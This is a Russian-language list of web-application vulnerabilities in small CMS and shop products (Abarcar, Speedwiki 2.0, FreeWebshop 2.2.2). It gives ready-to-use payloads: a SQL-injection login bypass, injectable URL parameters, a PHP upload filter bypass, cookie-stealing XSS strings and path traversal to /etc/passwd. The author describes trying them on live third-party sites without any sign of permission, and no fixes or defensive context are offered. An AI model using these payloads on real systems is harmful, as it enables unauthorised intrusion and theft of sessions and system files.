Уязвимость:
Возможно провести SQL-инъекцию и войти в зону пользователя, для этого
необходимо подготовить запрос и вставить в зону авторизации. Использование: username: 'or''='
passwd : 'or''=' Комментарий::
Проверить справедливость этой уязвимости не получилось по очень
банальной причине - продукт не используется на сайтах.
ПО: Abarcar
Сайт: http://www.abarcar.com/
Использование: /newsdetails.php?neid=[sql]
/slistl.php?slid=[sql]
/content.php?cat=[sql] Комментарий::
В Рунете этот продукт не используется, однако в Интернете я нашёл три
сайта, которые его используют. К сожалению на них уже была исправлена
данная ошибка и я не смог провести инъекцию.
ПО: Speedwiki
Версия: 2.0
Уязвимость:
Зарегистрированный пользователь может закачать PHP скрипт на сервер.
Возможность обойти фильтр реализована в cms запросе:
/speedywiki/index.php?upload=1
Так же возможно провести XSS-атаку и полное раскрытие путь продукта. Использование: /index.php?showRevisions=</textarea>'"><script>alert(document.cookie)</script>
/speedywiki/index.php?showRevisions[]=
/speedywiki/index.php?searchText[]=
/speedywiki/upload.php Комментарий::
Пока этот продукт в Интернете не используется, поэтому и сайтов на его
основе нет.
ПО: FreeWebshop
Версия: 2.2.2
Сайт: http://www.freewebshop.org/
Уязвимость:
Любой пользователь может получить доступ к любому файлу на сервере.
Возможно провести XSS-атаку. Использование: http://site.com/?page=../../../../../../../../../../etc/passwd%00
http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00
http://www.site.com/demo/index.php?page=browse&action=list&group=8&cat=</textarea>'"><script>alert(document.cookie)</script>
Комментарий::
В Рунете этот продукт не используется. Эксперементировал над буржуазными
сайтами, так выяснелось, что XSS-атаку провести можно, а вот получить
пароли - невозможно.